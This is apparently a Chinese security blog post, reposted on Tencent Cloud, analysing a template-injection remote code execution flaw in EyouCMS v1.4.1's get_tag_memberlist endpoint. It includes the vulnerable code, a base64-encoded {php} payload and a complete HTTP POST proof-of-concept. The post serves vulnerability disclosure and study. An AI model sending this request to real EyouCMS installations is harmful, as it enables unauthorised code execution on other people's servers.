前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >EyouCMS v1.4.1 任意代码执行

EyouCMS v1.4.1 任意代码执行

作者头像
LuckySec
发布2022-11-02 13:46:00
8540
发布2022-11-02 13:46:00
举报
文章被收录于专栏:LuckySec网络安全

0x001 EyouCMS

EyouCMS是基于TP5.0框架为核心开发的免费+开源的企业内容管理系统,专注企业建站用户需求

提供海量各行业模板,降低中小企业网站建设、网络营销成本,致力于打造用户舒适的建站体验

0x002 漏洞代码

漏洞代码文件位置:\EyouCMS\application\api\controller\Ajax.php

代码语言:javascript
复制
/**
 * 获取会员列表
 * @author 小虎哥 by 2018-4-20
 */
public function get_tag_memberlist()
{
    // https://gitee.com/weng_xianhu/eyoucms/issues/I15J1A
    # $this->success('此代码有安全漏洞!');

    if (IS_AJAX_POST) {
        $htmlcode = input('post.htmlcode/s');
        $htmlcode = htmlspecialchars_decode($htmlcode);

        $attarray = input('post.attarray/s');
        $attarray = htmlspecialchars_decode($attarray);
        $attarray = json_decode(base64_decode($attarray));

        /*拼接完整的memberlist标签语法*/
        $innertext = "{eyou:memberlist";
        foreach ($attarray as $key => $val) {
            if (in_array($key, ['js'])) {
                continue;
            }
            $innertext .= " {$key}='{$val}'";
        }
        $innertext .= " js='on'}";
        $innertext .= $htmlcode;
        $innertext .= "{/eyou:memberlist}";
        /*--end*/
        $msg = $this->display($innertext); // 渲染模板标签语法
        $data['msg'] = $msg;

        $this->success('读取成功!', null, $data);
    }
    $this->error('加载失败!');
}

0x003 漏洞分析

造成该漏洞的主要原因是以下这段代码的拼接操作,在接收POST参数时,只是简单的对POST参数进行base64加解密操作,并未对接收参数值进行安全过滤,直接将其拼接到源代码中,随后对代码对拼接后的语句进行模板渲染。

代码语言:javascript
复制
$attarray = input('post.attarray/s');
$attarray = htmlspecialchars_decode($attarray);
$attarray = json_decode(base64_decode($attarray));

$innertext = "{eyou:memberlist";
foreach ($attarray as $key => $val) {
    if (in_array($key, ['js'])) {
        continue;
    }
    $innertext .= " {$key}='{$val}'";
}
$innertext .= " js='on'}";

程序先将我们POST输入的attarray进行base64解密后与{eyou:memberlist进行拼接,最终形成类似这种形式:

代码语言:javascript
复制
{eyou:memberlist $key='$val' js='on'}

这里通过}来闭合前面的{eyou:memberlist达到任意代码执行的问题。因为解析的是json我们只需输入类似

代码语言:javascript
复制
{"}":"{php}phpinfo();{\/php}"}

将上诉利用代码进行base64编码后,即可达到任意代码执行的目的。

代码语言:javascript
复制
eyJ9Ijoie3BocH1waHBpbmZvKCk7e1wvcGhwfSJ9

0x004 漏洞触发

首先,分析确定该漏洞代码的触发条件:

代码语言:javascript
复制
if (IS_AJAX_POST) {

只要在数据包的HTTP Header中加入以下代码,即可触发漏洞条件。

代码语言:javascript
复制
X-Requested-With: XMLHttpRequest

POC:

代码语言:javascript
复制
POST /cms/EyouCMS/index.php?m=api&c=Ajax&a=get_tag_memberlist HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
X-Requested-With: XMLHttpRequest

attarray=eyJ9Ijoie3BocH1waHBpbmZvKCk7e1wvcGhwfSJ9
image
image

参考文章

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2020-05-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x001 EyouCMS
  • 0x002 漏洞代码
  • 0x003 漏洞分析
  • 0x004 漏洞触发
  • 参考文章
相关产品与服务
网站建设
网站建设(Website Design Service,WDS),是帮助您快速搭建企业网站的服务。通过自助模板建站工具及专业设计服务,无需了解代码技术,即可自由拖拽模块,可视化完成网站管理。全功能管理后台操作方便,一次更新,数据多端同步,省时省心。使用网站建设服务,您无需维持技术和设计师团队,即可快速实现网站上线,达到企业数字化转型的目的。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档